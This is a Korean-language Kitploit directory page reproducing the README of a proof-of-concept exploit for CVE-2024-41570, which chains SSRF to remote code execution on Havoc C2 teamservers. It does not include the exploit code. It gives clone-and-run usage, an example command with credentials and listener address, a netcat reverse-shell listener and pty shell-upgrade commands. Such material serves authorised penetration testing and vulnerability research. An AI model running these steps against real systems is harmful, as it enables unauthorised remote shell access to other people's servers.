Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-41570 — WebSocket을 통한 자동화된 리버스 셸 익스플로잇 | Havoc-C2-SSRF (RCE 포함) | Kitploit
도구/GitHubGitHub/diemoeve/cve-2024-41570
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed TeamingRemote Access Tool
GitHubdiemoeve/cve-2024-41570

CVE-2024-41570

WebSocket을 통한 자동화된 리버스 셸 익스플로잇 | Havoc-C2-SSRF (RCE 포함)

저장소 보기
122141년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-41570 | Havoc C2 SSRF를 통한 RCE | WebSocket을 통한 자동화된 리버스 셸 익스플로잇

이 프로젝트는 취약한 WebSocket 기반 서비스를 익스플로잇하기 위한 Python 기반 개념 증명(PoC) 스크립트를 제공합니다. 이 스크립트는 에이전트 등록, WebSocket 페이로드 전달 및 원격 명령 실행을 자동화하여 리버스 셸을 설정합니다.

Features

  • 대상 서비스에 에이전트를 등록합니다.
  • WebSocket을 열고 핸드셰이크 및 인증 페이로드를 전송합니다.
  • 리버스 셸을 통해 원격으로 명령을 실행합니다.
  • 명확한 지침이 포함된 안내 워크플로우를 제공합니다.

Prerequisites

  • Python 3.x가 설치되어 있어야 합니다.
  • 필요한 종속성을 설치하려면 다음 명령을 실행하세요:
    root@kitploit:~
    pip install -r requirements.txt
    

Installation

  1. 이 리포지토리를 클론합니다:
    root@kitploit:~
    git clone https://github.com/kit4py/CVE-2024-41570.git
    
  2. 프로젝트 디렉토리로 이동합니다:
    root@kitploit:~
    cd CVE-2024-41570
    
  3. 종속성을 설치합니다:
    root@kitploit:~
    pip install -r requirements.txt
    

Usage

다음 인수를 사용하여 스크립트를 실행합니다:

root@kitploit:~
python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>

Arguments

  • -t: WebSocket 서버의 대상 URL.
  • -i: Havoc의 Team Server IP 주소.
  • -p: Havoc의 Team Server 포트.
  • -U: WebSocket 인증을 위한 사용자 이름.
  • -P: WebSocket 인증을 위한 비밀번호.
  • -l: 리버스 셸을 위한 리스너 IP (자신의 머신).
  • -L: 리버스 셸을 위한 리스너 포트 (자신의 머신).

Example Command

root@kitploit:~
python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444

Steps to Execute

  1. 대상 서비스가 실행 중이고 취약한지 확인하세요.
  2. 필요한 매개변수로 스크립트를 실행하세요.
  3. 별도의 터미널에서 리스너를 시작합니다:
    root@kitploit:~
    nc -lvnp <listener_port>
    
  4. 셸 업그레이드:
    root@kitploit:~
    python -c 'import pty; pty.spawn("/bin/bash")' 
    export TERM=xterm-256color
    stty rows 67 columns 318
    

Dependencies

이 스크립트는 다음 Python 라이브러리가 필요합니다:

  • requests
  • pycryptodome

다음 명령으로 설치합니다:

root@kitploit:~
pip install -r requirements.txt

Security Notice

이 스크립트는 교육 목적으로만 제공됩니다. 대상 시스템을 테스트하기 위해 명시적인 승인을 받았는지 확인하세요. 이 스크립트를 오용하면 법률 및 윤리 지침을 위반할 수 있습니다.

References

Default Havoc Poc에서 영감을 받았습니다.

Contributing

기여를 환영합니다! 언제든지 리포지토리를 포크하고 풀 리퀘스트를 제출해 주세요.

License

이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하세요.

도구 다운로드